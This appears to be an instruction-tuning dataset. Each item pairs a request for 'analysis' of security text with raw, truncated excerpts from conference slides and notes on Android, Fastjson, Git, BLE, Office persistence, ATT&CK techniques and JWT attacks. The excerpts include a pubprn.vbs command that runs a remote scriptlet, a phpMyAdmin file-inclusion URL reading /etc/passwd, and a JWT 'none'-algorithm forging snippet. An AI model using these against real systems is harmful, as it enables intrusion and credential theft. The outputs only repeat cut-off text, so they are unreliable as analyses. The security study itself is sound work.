several days and obtained the following measurements: (1) The number of requests for the hidden s", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nInsecure Internal Storage in Android Claud Xiao HITCON, Taipei 2014.08 Its well known that in Android  external storage is globally read/writable thus not secure;  internal storage is isolated for each apps by sandbox thus is secure enough.  By Googles suggestion, applications store sensitive data and configurations here. 2 | Claud Xiao. Insecure Internal Storage in Android. HITCON, 2014.08 h\"p://developer.android.com/training/ar4cles/security-4ps.html#StoringData Today, were going to  Present an attack to read/write data in internal storage  by combination of disclosed attacks and vulnerabilities.  Explain why 94.2% of popular apps are all vulnerable  Disclose one category of apps storing password in plaintext  which are under the attack above,  affect billions of Android users,  and may lead to enterprise or server account leaking.  Discuss some ideas of mitigation. 3 | Claud Xiao. Insecure Internal Storage in Android. HITCON, 2014.08 Attacks ADB backup and restore  Android Debug Bridge  ADB backup  Fully backup almost all apps internal data from device to PC.  Password to encrypt backup archive is optional but not enforced.  ADB restore  Restore a backup archive to device.  Can modify data in the archive before restore it.  More details on archive format:  http://nelenkov.blogspot.com/2012/06/unpacking-android- backups.html 5 | Claud Xiao. Insecure Internal Storage in Android. HITCON, 2014.08 Exceptions  These apps wont be backup or restored:  whose android:allowBackup is false in AndroidManifest.xml  who implemented a BackupAgent by themselves.  When developers not set android:allowBackup manually, its value will be true by default!  How many apps can be backup? Will be discussed later. 6 | Claud Xiao. Insecure Internal Storage in Android. HITCON, 2014.08 Its a known attack surface  Used to root Android devices like  some phone/tablet models (on XDA Developers)  and even Google Glass  But these methods are NOT designed for real attacks  need user interactions  o", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHow I use a JSON Deserialization 0day to Steal Your Money On The Blockchain Ronny Xing & Zekai Wu  Tencent Security Xuanwu Lab  Applied and real world security research  Ronny Xing( @RonnyX2017)  Zekai Wu( @hellowuzekai) > Whoami 1. What is Fastjson 2. Fastjson Deserialize and Vulnerability 3. Find Gadgets to RCE and more 4. RCE on the Tron HTTP nodes 5. Post Penetration Exploit to Steal your Money 6. Conclusion > Agenda 1. What is Fastjson 2. Fastjson Deserialize and Vulnerability 3. Find Gadgets to RCE and more 4. RCE on the Tron HTTP nodes 5. Post Penetration Exploit to Steal your Money 6. Conclusion > Agenda  JSON parser with 23000+ stars on GitHub.  Widely used java basic component, known for its fast parsing speed  Two major security fixes about deserialization vulnerability in 2017 and 2018 What is Fastjson 3,600 Maven Artifacts using Fastjson 1. What is Fastjson 2. Fastjson Deserialize and Vulnerability 3. Find Gadgets to RCE and more 4. RCE on the Tron HTTP nodes 5. Post Penetration Exploit to Steal your Money 6. Conclusion > Agenda Deserialize ParserConfig.getGlobalInstance() .setAutoTypeSupport(true); User user = (User)fastjson.JSON.parse(\"{...}\"); System.out.print(user.getName()); String name = \"foo\"; User u1 = new User(); u1.setName(name); fastjson.JSON.toJSONString (u1,SerializerFeature.WriteClassName); {\"@type\":\"User\",\"name\":\"foo\"} JavaBean public class User { private String name; public String getName() { return name; } public void setName(String name) { this.name = name; } } JSON: AutoType Default False JSONException: autoType is not support Deserialize Token Key \"@type\" checkAutoType(String typeName, Class<?> expectClass, int features) ObjectDeserializer getDeserializer(Class<?> clazz, Type type) select or create Deserializer for target type check pass Object createInstance( args from json ) JSON.parse(\" {\"@type\": \"User\"} \"); scan enter deserialization Defense checkAutotype() checkAutoType(String typeName, Class<?> expectClass, int features) How to", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nJohn Menerick  August 2015 Backdooring Git # Legal Disclaimer # Thank you for coming # What we are covering # What we are not covering # What we are not covering # Software is like sex; it is better when it is free Linus Torvalds Name the Quote Setting the Stage # Good luck! # Revision control vs. Source Control Source control == source code change management # Wrong Tool for the Job # Right Tool for the Job # Distributed vs. Centralized # Helfe! # Trends Git # Definition 1 While it works, angel sings and light shines from above - Global information tracker # Definition 2 When it dies, fire erupts from under your feet - Goddamn idiot truckload of sh*t # Hitler Uses Git # Rings of Trust # If you have ever done any security work - and it did not involve the concept of network of trust - it wasnt security work, it was - <insert word my mother would not approve me stating>. I dont know what you were doing. But trust me, its the only way you can do security. its the only way you can do development. Linus Torvalds Name the Quote # Typical Trust Relationships # Morons Since you do not want everybody to write to the central repository because most people are morons, you create this class of people who are ostensibly not morons. And most of the time what happens is that you make that class too small, because it is really hard to know if a person is smart or not, and even if you make it too small, you will have problems. So this whole commit access issue, which some companies are able to ignore by just giving everybody commit access, is a huge psychological barrier and causes endless hours of politics in most open source projects Empircal Study # SVN # Git # Not Scientific CVE Search # GitLab # GitLab 0day # Functionality or Backdoor? # 2003 Linux backdoor # 2003 Linux backdoor # 2003 Linux backdoor # Old School Cloud Repository Hacks # New School Cloud Repository Hacks # New School Cloud Repository Hacks # New School Cloud Repository Hacks # New School Cloud Repository Hacks ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nhttp://www.infobytesec.com Francisco Amato / Federico Kirschbaum evilgrade, \"You STILL have pending upgrades! Defcon 18 2010 http://www.infobytesec.com Introduction Topics - Client side explotation - Update process - Poor implementation of update processes - Attack vectors - evilgrade framework presentation http://www.infobytesec.com Introduction Client side explotation Searching the Weakest Link Bypassing the fortress walls This technique allows for example transform a user terminal in a proxy to access the internal network of a company http://www.infobytesec.com General applications update process How does it works?  Update process are either manual or automatic.  The process requests a special file in the master server for example update.application.com/info.xml  The file has the internal information of the available updates. Its installed automatic or ask if you like to install the new update. http://www.infobytesec.com Whats the problem? http://www.infobytesec.com Is there any problem? Trust  A lot of application dont verify the updates contents.  They blindly trust without verification of the master update server. http://www.infobytesec.com evilgrade Tool Information evilgrade is modular framework that allow us to take advantage of poor update implementations by injecting fake updates.  Its a opensource project  Its developed in Perl http://www.infobytesec.com evilgrade How does it work? It works with modules, each module implements the structure needed to emulate a false update of specific application. evilgrade needs the manipulation of the victimss dns traffic http://www.infobytesec.com evilgrade Normal update process 1. App1 start the update process 2. Consult to the dns server host update.app1.com 3. DNS server replies 200.1.1.1 4. App gets the file lastupdate.xml from update.app1.com 5. App analyzes the update file and detect a new update 6. App1 downloads and execute the update http:// update.app1.com/update.exe http://www.infobytesec.com evilgrade Atta", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nKCon KCon 重现速8僵尸车队 蓝牙4.0 BLE协议的进攻 杨 晋 ThreatBook 曾仸职于 MicrosoftCOMODOQihoo360 邮箱yangjin@threatbook.cn LinkedinJin Yang PART 01 BLE是什么 PART 02 协议技术特点 PART 03 寻找身边的设备 PART 04 如何嗅探BLE协议数据 PART 05 协议分析与攻击方式 目录 CONTENTS 01 BLE是什么 BLE是什么 - Bluetooth 4.0 协议家族 2012 - 经典蓝牙 Classic Bluetooth - 高速蓝牙 - 低功耗蓝牙 Bluetooth Low Energy BLE是什么 - BLE VS 经典蓝牙 技术规范 BLE 经典蓝牙 频率 2.4GHz 2.4GHz 作用距离 100m 10m 响应延时 1-3ms 100ms 安全性 128-bit AES 64/128-bit 能耗 1-50% 100% 传输数据速率 1Mb/s 1-3Mb/s BLE是什么 - 哪些设备在使用BLE协议 - 可穿戴设备智能手表手环无线耳机鼠标/键盘 - 家庭用智能设备门锁智能玩具音箱 - 特种行业内设备医疗器械汽车自动化 02 协议技术特点 协议技术特点 BLE协议栈 APP HOST CONTROLLER 协议技术特点 控制器部分 Controller 物理层 Physical Layer 链路层 Link Layer 主机控制接口层 Host Controller Interface 主机 Host GATT 通用属性配置文件层 Generic Attribute Profile GAP 通用访问配置文件层 Generic Access Profile L2CAP 逻辑链路控制及自适应协议层 Logical Link Control and Adaptation Protocol 安全管理层Security Manager ATT 属性协议层Attribute Protocol 协议技术特点 - 物理层特性 - 免费的ISM频段2.400 - 2.4835 GHz - 分为40个频段0  39 每仹的带宽为2MHz - 跳频通信 Hopping 协议技术特点 - 广播频段与数据频段 - 3 channels37 38 39 - 37 channels0  36 - 广播频段跳频与数据频段跳频 协议技术特点 频率 频段类型 数据频道编号 广播频道编号 2402MHz 广播 37 2404MHz 数据 0  数据  2424MHz 数据 10 2426MHz 广播 38 2428MHz 数据 11  数据  2478MHz 数据 36 2480MHz 广播 39 协议技术特点 当发生ADV_CONNECT_REQ后确定了 Hop Increment = 0x0C Data Channel 12 Data Channel 24 Data Channel 36 Data Channel 11 Data Channel 23 Data Channel 35 Data Channel 10 03 寻找身边的设备 寻找身边的设备 - 最简单的方法 iPhone LightBlueBLE Finder  寻找身边的设备 - 利用 nRF51822 芯片来寻找 寻找身边的设备 - 大概判断一个设备的距离 04 如何嗅探BLE协议数据 如何嗅探BLE协议数据 - 嗅探 广播频道数据 - 嗅探 数据频道数据 - 处理跳频 - 4种嗅探BLE协议数据的设备 如何嗅探BLE协议数据 - Ubertooth One 2011 - Ubertooth 是著名无线硬件黑客 Michael Ossmann 研发 的一个基于2.4GHz的开源无线蓝牙开发平台共有两个版本 分别是 Ubrtooth-One 和 Ubertooth-Zero 而 Zero 版本 已经停止开发很多的最新功能以及平台已经无法支持 Zero - Ubertooth + Wireshark + Kismet + Crackle 如何嗅探BLE协议数据 - Ubertooth 负责嗅探BLE协议数据并存储 - Wireshark + Kismet 分析BLE报文 - Crackle 在获取到一定数量的BLE报文之后就可以用 它来破解出 STK/LTK https://github.com/mikeryan/crackle 如何嗅探BLE协议数据 Ubertooth One 如何嗅探BLE协议数据 - HackRF SDR8 bit - Michael Ossmann 和 Jared Boone 一起研发的一款廉价且功能 丰富的SDR硬件", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# phpmyadmin 4.8.1 远程文件包含漏洞CVE-2018-12613 phpMyAdmin是一套开源的基于Web的MySQL数据库管理工具其index.php中存在一处文件包含逻辑通过二次编码即可绕过检查造成远程文件包含漏洞 参考文档 - https://mp.weixin.qq.com/s/HZcS2HdUtqz10jUEN57aog - https://www.phpmyadmin.net/security/PMASA-2018-4/ ## 漏洞环境 执行如下命令启动phpmyadmin 4.8.1 ``` docker compose up -d ``` 环境启动后访问`http://your-ip:8080`即可进入phpmyadmin配置的是config模式所以无需输入密码直接登录test账户 ## 漏洞复现 访问`http://your-ip:8080/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd`可见`/etc/passwd`被读取说明文件包含漏洞存在 ![](1.png) 利用方式也比较简单可以执行一下`SELECT '<?=phpinfo()?>';`然后查看自己的sessionidcookie中phpMyAdmin的值然后包含session文件即可 ![](2.png)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n.\\\" Chinese Version Copyright riser, checker :meaculpa .\\\" Copyright (c) 1998 Sendmail, Inc. All rights reserved. .\\\" Copyright (c) 1988, 1991, 1993 .\\\" The Regents of the University of California. All rights reserved. .\\\" .\\\" By using this file, you agree to the terms and conditions set .\\\" forth in the LICENSE file which can be found at the top level of .\\\" the sendmail distribution. .\\\" .\\\" .\\\" @(#)makemap.8 8.12 (Berkeley) 11/13/1998 .\\\" .TH makemap 8 \"BSD 4.4\" \"11/16/1992\" .Dd 1992年11月16日 .Dt MAKEMAP 8 .Os BSD 4.4 .Sh NAME(名称) .Nm makemap .Nd 为sendmail创建数据库映像表 .Sh SYNOPSIS(总览) .Nm .Op Fl N .if \\nP .Op Fl c Ar cachesize .Op Fl d .Op Fl f .if \\nP .Op Fl l .Op Fl o .Op Fl r .Op Fl s .Op Fl v .Ar maptype .Ar mapname .Sh DESCRIPTION(描述) .Nm 创建 .Xr sendmail 8 中关键字式映像查询所使用的数据库映像表. 它从标准输入设备读取输入并输出到指定的 .Ar mapname . .Pp 根据其编译的方式不同, .Nm 可以处理多达三种不同的数据库格式, 这些格式由 .Ar maptype 参数确定. 它们可能为: .Bl -tag -width Fl .It Li btree B-Tree格式映像表. 这需要新的Berkeley DB库. .It Li hash Hash格式映像表. 这也需要Berkeley DB库. .El .Pp 普遍而言, .Nm 从标准输入设备读取行这些行由以空格分隔的两个单词组成. 第一个为数据库关键字, 第二个为数值. 数值可能包含 ``%\\fIn\\fP'' 字符串用来标明参数替换. 如果包含文本式的百分符号则应该重复写 (``%%''). 忽略空行和以``#''开头的行. .Ss Flags(标识) .Bl -tag -width Fl .It Fl N 包含null字节用来结束映像表中的字符串. 这必须与sendmail.cf中``K''行的\\-N标识匹配. .if \\nP \\ \\{\\ .It Fl c 使用指定的hash和B-Tree缓冲大小. .\\} .It Fl d 允许映像表中的关键字重复. 这只能在B-Tree格式的映像表中允许. 如果读入两个相同的关键字, 那么它们都会插入到映像表中. .It Fl f 通常所有关键字中的大写字母都会转换成小写字母. 这个标识可以屏蔽这种功能. 这是为了配合sendmail.cf中 \\fBK\\fP 行的\\-f标识的使用. 数值永远不作字母大小写的转换. .if \\nP \\ \\{\\ .It Fl l 列出支持的映像类型. .\\} .It Fl o 添加到一个旧的文件中. 允许你增大一个已存在的文件. .It Fl r 允许替换已存在的关键字. 如果你重复一个关键字, 通常 .Nm 会抱怨而且不进行插入. .It Fl s 忽略正在创建的映像表的安全性检查. 这包括对完全可写目录中硬链接或者符号链接的检查. .It Fl v 详尽地打印出正在执行什么. .El .Sh SEE ALSO(另见) .Xr sendmail 8 .Sh HISTORY(历史) .B makemap 命令出现于 BSD 4.4v .Sh \"[中文版维护人]\" .B riser <boomer@ccidnet.com> .Sh \"[中文版最新更新]\" .B 2001/2/25 .Sh 中国 Linux 论坛 man 手册页翻译计划: .B http://cmpp.linuxforum.net", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nPUBLIC Persisting with Microsoft Office: Abusing Extensibility Options William Knowles PUBLIC Obligatory $whoami  William Knowles  Security Consultant at MWR InfoSecurity  @william_knows 1 PUBLIC Agenda  DLL  VBA  COM  VSTO  Prevention and Detection 2 PUBLIC Motivations  Its everywhere- and its got lots of use cases  Office templates? What else? 3 PUBLIC Word  Linked Libraries?  Its just a DLL    are standard Windows DLLs that implement and export specific methods to extend Word functionality   no enhancements and no documentation updates to Word WLLs since Microsoft Office 97 4 PUBLIC Excel (XLL?) too   Slightly more updated  latest SDK from 2007.  You need to export the right functions.  Also slightly more configuration: HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Excel\\Options 5 PUBLIC DLL Add-Ins for Word and Excel PUBLIC Excel VBA Add-Ins  Its all VBA, no spreadsheets.  *.xla // *.xlam 7 PUBLIC PowerPoint VBA Add-Ins  *.ppa // *.ppam  Again, its inconsistent, and needs manual configuration: HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\PowerPoint\\AddIns\\<AddInName> 8 PUBLIC VBA Add-Ins for Excel and PowerPoint  and others PUBLIC COM in Two Minutes  Based on OLE and ActiveX  its a standard to enable component interaction.  COM objects, DLLs and .Net 10 PUBLIC COM Add-Ins for *  COM  the legacy way is always a good way.  The IDTExtensibility2 interface.  Registration can be problematic  HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\<Program>\\Addins\\<AddInName>  Register with regasm.exe /codebase InconspicuousAddIn.dll. 11 PUBLIC =sum(calc) with Excel Automation Add-Ins  Specific COM use case  for user defined functions. HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Office\\15.0\\Excel\\Options  Register again with regasm.exe. 12 PUBLIC =sum(calc) with Excel Automation Add-Ins 13 PUBLIC Attacking VBA Snoopers with VBE Add-Ins  Why? Why? Why?  More registry edits, more regasm.exe HKEY_CURRENT_USER\\Software\\Microsoft\\VBA\\VBE\\6.0\\Addins\\<VBEAddIn.Name> 14 PUBLIC COM Add-In", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# T1216-001-win-签名脚本代理执行-PubPrn ## 来自ATT&CK的描述 攻击者可能会使用 PubPrn 来代理恶意远程文件的执行PubPrn.vbs 是一个将打印机发布到 Active Directory 域服务的Visual Basic脚本该脚本由 Microsoft 签名通常通过Windows shell `Cscript.exe`. 例如以下代码在指定域内发布打印机`cscript pubprn Printer1 LDAP://CN=Container1,DC=Domain1,DC=Com` 攻击者可能会滥用PubPrn来执行托管在远程站点上的恶意负载为此攻击者可以设置第二个`script:`参数以引用托管在远程站点上的脚本文件 (.sct)一个示例命令`pubprn.vbs 127.0.0.1 script:https://mydomain.com/folder/file.sct`. 此行为可能会绕过签名验证限制和不考虑滥用此脚本的应用程序控制 在更高版本的 Windows (10+) 中`PubPrn.vbs`已更新防止从远程站点执行代理这是通过将第二个参数中指定的协议限制为来完成的也就是可用于通过 HTTP(S) 引用远程代码`LDAP://`的`script:`绰号 ## 测试案例 ### 测试1 PubPrn.vbs Signed Script Bypass 执行已签名的PubPrn.vbs脚本该脚本可以下载和执行任意有效载荷 攻击命令Windows命令行执行即可 ``` cscript.exe /b C:\\Windows\\System32\\Printing_Admin_Scripts\\en-US\\pubprn.vbs localhost \"script:#{remote_payload}\" ``` remote_payload<https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216.001/src/T1216.001.sct> ## 检测日志 Windows 安全日志Sysmon日志 ## 测试复现 ### 测试1 PubPrn.vbs Signed Script Bypass ``` C:\\Users\\Administrator.ZHULI>cscript.exe /b C:\\Windows\\System32\\Printing_Admin_Scripts\\zh-CN\\pubprn.vbs localhost \"script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216.001/src/T1216.001.sct\" ``` 注意操作系统语言语言不同VBS脚本所在位置不同 ## 测试留痕 Windows Sysmon日志 ``` Process Create: 事件ID 1进程创建 RuleName: technique_id=T1059,technique_name=Command-Line Interface UtcTime: 2022-01-11 08:05:07.983 ProcessGuid: {78c84c47-3a33-61dd-3924-000000000800} ProcessId: 2000 Image: C:\\Windows\\System32\\cscript.exe FileVersion: 5.812.10240.16384 Description: Microsoft Product: Microsoft  Windows Script Host Company: Microsoft Corporation OriginalFileName: cscript.exe CommandLine: cscript.exe /b C:\\Windows\\System32\\Printing_Admin_Scripts\\zh-CN\\pubprn.vbs localhost \"script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216.001/src/T1216.001.sct\" CurrentDirectory: C:\\Users\\Administrator.ZHULI\\ User: ZHULI\\Administrator LogonGuid: {78c84c47-f665-61db-95da-440100000000} LogonI", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# T1003-005-win-DCC2-mimikatz凭证获取 ## 来自ATT&CK的描述 攻击者可能试图访问缓存的域凭据该凭据用于在域控制器不可用的情况下进行身份验证 在Windows Vista及更高版本上哈希格式为DCC2域缓存凭据版本2哈希也称为MS-Cache v2哈希默认缓存凭据的数量各不相同并且每个系统都可以更改该散列不允许通过散列样式的攻击而是需要使用密码破解来恢复纯文本密码 通过SYSTEM访问可以使用诸如MimikatzReg和secretsdump.py之类的工具/实用程序来提取缓存的凭据 注意Windows Vista的缓存凭据是使用PBKDF2派生的 ### DCC2Domain Cached Credentials version 2 Domain Cached Credentials 简称 DDC域缓存凭据是缓存的域登录信息这些信息本地存储在Windows操作系统的windows注册表中可以通过以下键中的regedit以SYSTEM特权运行来查看 ```dos HKEY_LOCAL_MACHINE\\SECURITY\\Cache ``` 随着Windows Vista操作系统的发布Microsoft引入了一种新的哈希算法来生成这些域缓存的凭据这种新算法即DCC2将密码猜测攻击的成本提高了几个数量级 DCC2域缓存凭据版本2Windows Vista和更新版本的操作系统使用此算法来缓存和验证相关服务器域控不可用时的远程凭据它有许多其他名称包括 mscache2和 mscash2Microsoft CAched haSH它取代了Windows 早期版本中使用的较弱的msdcc v1哈希从安全角度来看它并不是特别弱但是由于它使用了用户名作为盐因此除了验证现有的缓存凭据之外不应将其用于任何其他用途简单来说它是缓存在操作系统本地注册表中的域凭据+域授权信息后面简称授权凭据 举个例子你的个人办公电脑加入了公司的办公域你一直使用域账户进行登录而不是本地账户登录你利用域账户登录时所输入的账户密码由域控进行验证当域控验证成功后你可以登录这台办公电脑但当你的个人办公电脑处于断网或者在其他地方办公非公司办公域环境时你依然可以使用域账户登录这台办公电脑也就是说当这台电脑根本无法连接到域控的时候你也可以使用域账户登陆这台电脑那这个时候是由谁来负责验证你输入的域账号密码是否正确呢就是MSCACHE ### MSCACHE工作原理介绍 当终端或其他设备可以连上域控的时候你用域账号去登陆这台终端或其他设备在登陆成功后域控验证了你的身份后操作系统会将你的授权凭据以及授权信息保存在注册表里面默认是保存 10 个授权凭据可以对这个值进行更改当被保存的授权凭据已经超过 10 个的话新的授权凭据会覆盖掉老的授权凭据 授权凭据被缓存在注册表里的这些用户在机器连不上域控的时候也可以登陆这台机器只能交互式登陆比如控制台或远程桌面远程桌面的时候要注意不能使用带有 NLA网络级别身份验证  功能的 RDP 客户端要用老的比如 XP 上默认 RDP 客户端但是没有被缓存在注册表里的用户是无法登陆的 ### 网络级别身份验证 (NLA) 在这里简单介绍一下NLA是什么 网络级别身份验证 (NLA) 是一项新的身份验证方法即在您建立完整的远程桌面连接前就完成了用户身份验证并显示登录屏幕它是一项更加安全的身份验证方法可以防止远程计算机受到黑客或恶意软件的攻击NLA 的优点是 - 最初只需要少量的远程计算机资源对用户进行身份验证之前远程计算机仅使用有限的资源而不是像在先前版本中启动整个远程桌面连接 - 可以通过降低拒绝服务攻击尝试限制或阻止访问 Internet的风险提供更高的安全保障 - 使用远程计算机身份验证可以防止我们连接到因恶意目的而安装的远程计算机 ### MSCACHE 解密 - Bootkey, LSA Key, NLKM Key 所以我们要想解密 MSCACHE要进行以下步骤 1. 得到 bootkey 2. 利用 bootkey 解密 LSA Key 3. 利用 LSA Key 解密 NLKM Key 4. 利用 NLKM Key 解密 MSCACHE 以上内容引用自<https://baijiahao.baidu.com/s?id=1611304657392579351> ## 测试案例 值得注意的是MSCACHE 保存的是 DCC hash而并不是 NTLM 的 HASH所以你导出的域缓存的 hash 是不能用于 PTH 的只能用来破解可以使用许多工具通过内存技术检索SAM文件 - pwdumpx.exe - gsecdump - mimikatz - cachedump - ...... 或者可以使用reg.exe从Registr", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# JWT 安全 --- ## 免责声明 `本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.` --- 关于 JWT 认证的基本知识点可见笔记 [认证 & 授权](../../../../Develop/Web/笔记/认证&授权.md#JWT) **相关文章** - [全程带阻:记一次授权网络攻防演练 (上) ](https://www.freebuf.com/vuls/211842.html) - [对jwt的安全测试方式总结](https://saucer-man.com/information_security/377.html) - [攻击JWT的一些方法 ](https://xz.aliyun.com/t/6776) - [JWT攻击手册如何入侵你的Token](https://mp.weixin.qq.com/s/x43D718Tw3LZ4QGFxjLjuw) - [JSON Web Token Validation Bypass in Auth0 Authentication API](https://insomniasec.com/blog/auth0-jwt-validation-bypass) - [对一个使用JWT验证的系统渗透纪实](https://blog.wanghw.cn/security/fake-jwt.html) **Tips** 搜索 JWT 的正则,来自 以下正则来自 以下内容来自 <sup>[ [ticarpi/jwt_tool](https://github.com/ticarpi/jwt_tool#tips) ]</sup> ```re [= ]ey[A-Za-z0-9_-]*\\.[A-Za-z0-9._-]* 稳定的 JWT 版本 [= ]ey[A-Za-z0-9_\\/+-]*\\.[A-Za-z0-9._\\/+-]* 所有 JWT 版本可能误报 ``` python快速生成 jwt ```python import jwt jwt.encode({'字段1':'test','字段2':'123456'},algorithm='none',key='') ``` **相关工具** - [JSON Web Tokens - jwt.io](https://jwt.io/) - 在线的 jwt 生成 - [ticarpi/jwt_tool](https://github.com/ticarpi/jwt_tool) - 一个用于验证伪造和破解JWTJSON Web令牌的工具包 - [Ch1ngg/JWTPyCrack](https://github.com/Ch1ngg/JWTPyCrack) - [crack JWT](https://pastebin.com/tv99bTNg) - [brendan-rius/c-jwt-cracker](https://github.com/brendan-rius/c-jwt-cracker) - [andresriancho/jwt-fuzzer](https://github.com/andresriancho/jwt-fuzzer) - [ozzi-/JWT4B](https://github.com/ozzi-/JWT4B) - 即时操作 JWT 的 burp 插件 - [3v4Si0N/RS256-2-HS256](https://github.com/3v4Si0N/RS256-2-HS256) - JWT 攻击将算法由 RS256 变为 HS256 - [x1sec/gojwtcrack](https://github.com/x1sec/gojwtcrack) - Fast JSON Web Token (JWT) cracker written in Go ``` gojwtcrack -t token.txt -d ~/SecLists/Passwords/xato-net-10-million-passwords-1000000.txt ``` - [aress31/jwtcat](https://github.com/aress31/jwtcat) - A CPU-based JSON Web Token (JWT) cracker and - to some extent - scanner. - [ahwul/jwt-hack](https://github.com/hahwul/jwt-hack) - jwt-hack is tool for hacking / security testing to JWT. Supported for En/decoding J", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n网络空间安全技术丛书 企业安全建设指南金融行业安全架构与技术实践 聂君 李燕 何扬军 编著 ISBN978-7-111-62203-1 本书纸版由机械工业出版社于2019年出版电子版由华章分社北京华章图文信息有限公司北京奥维 博世图书发行有限公司全球范围内制作与发行 版权所有侵权必究 客服热线+ 86-10-68995265 客服信箱service@bbbvip.com 官方网址www.hzmedia.com.cn 新浪微博 @华章数媒 微信公众号 华章电子书微信号hzebook 目录 对本书的赞誉 序一 序二 序三 前言 第一部分 安全架构 第1章 企业信息安全建设简介 1.1 安全的本质 1.2 安全原则 1.3 安全世界观 1.4 正确处理几个关系 1.5 安全趋势 1.6 小结 第2章 金融行业的信息安全 2.1 金融行业信息安全态势 2.2 金融行业信息安全目标 2.3 信息安全与业务的关系矛盾与共赢 2.4 信息安全与监管的关系约束与保护 2.5 监管科技 2.6 小结 第3章 安全规划 3.1 规划前的思考 3.2 规划框架 3.3 制订步骤 3.3.1 调研 3.3.2 目标现状和差距 3.3.3 制订解决方案 3.3.4 定稿 3.3.5 上层汇报 3.3.6 执行与回顾 3.4 注意事项 3.5 小结 第4章 内控合规管理 4.1 概述 4.1.1 合规内控风险管理的关系 4.1.2 目标及领域 4.1.3 落地方法 4.2 信息科技风险管理 4.2.1 原则 4.2.2 组织架构和职责 4.2.3 管理内容 4.2.4 管理手段和流程 4.2.5 报告机制 4.2.6 信息科技风险监控指标 4.3 监督检查 4.4 制度管理 4.5 业务连续性管理 4.5.1 定义和标准 4.5.2 监管要求 4.5.3 BCM实施过程 4.5.4 业务影响分析和风险评估 4.5.5 BCP演练和改进 4.5.6 DRI组织及认证 4.6 信息科技外包管理 4.7 分支机构管理 4.8 信息科技风险库示例 4.9 小结 第5章 安全团队建设 5.1 安全团队建设的痛点 5.2 安全团队面临的宏观环境 5.3 安全团队文化建设 5.4 安全团队意识建设 5.5 安全团队能力建设 5.5.1 确定目标找准主要矛盾 5.5.2 梳理和细分团队职能 5.5.3 建立学习框架提升知识和技能水平 5.5.4 掌握学习方法实现事半功倍的效果 5.6 安全团队建设路径 5.7 安全人员职业规划 5.8 安全团队与其他团队的关系处理 5.9 小结 第6章 安全培训 6.1 安全培训的问题与痛点 6.1.1 信息安全意识不足的真实案例 6.1.2 信息安全培训的必要性 6.1.3 信息安全培训的痛点 6.2 信息安全培训关联方 6.3 信息安全培训百宝箱 6.4 面向对象的信息安全培训矩阵 6.5 培训体系实施的效果衡量 6.6 小结 第7章 外包安全管理 7.1 外包安全管理的问题与痛点 7.1.1 几个教训深刻的外包风险事件 7.1.2 外包安全管理的必要性 7.1.3 外包管理中的常见问题 7.2 外包战略体系 7.3 外包战术体系 7.3.1 事前预防 7.3.2 事中控制 7.3.3 事后处置 7.4 金融科技时代的外包安全管理 7.5 小结 第8章 安全考核 8.1 考核评价体系与原则 8.2 安全考核对象 8.3 考核方案 8.3.1 考核方案设计原则 8.3.2 总部IT部门安全团队 8.3.3 总部IT部门非安全团队平行团队 8.3.4 个人考核 8.3.5 一些细节 8.4 与考核相关的其他几个问题 8.5 安全考核示例 8.6 小结 第9章 安全认证 9.1 为什么要获得认证 9.2 认证概述 9.2.1 认证分类 9.2.2 认证机构 9.3 选择什么样的认证 9.4 如何通过认证 9.5 小结 第10章 安全预算总结与汇报 10.1 安全预算 10.2 安全总结 10.3 安全汇报 10.4 小结 第二部分 安全技术实战 第11章 互联网应用安全 11.1 端口管控 11.2 Web应用安全 11.3 系统安全 11.4 网络安全 11.5 数据安全 11.6 业务安全 11.7 互联网DMZ区安全管控标准 11.8 小结 第12章 移动应用安全 12.1 概述 12.2 APP开发安全 12.2.1 AndroidManifest配置安全 12.2.2 Activity组件安全 12.2.3 Service组件安全 12.2.4 Provider组件安全 12.2.5 BroadcastReceiver组件安全 12.2.6 WebView组件安全 12.3 APP业务安全 12.3.1 代码安全 12.3.2 ", "category": "text_analysis", "source": "security_papers"}
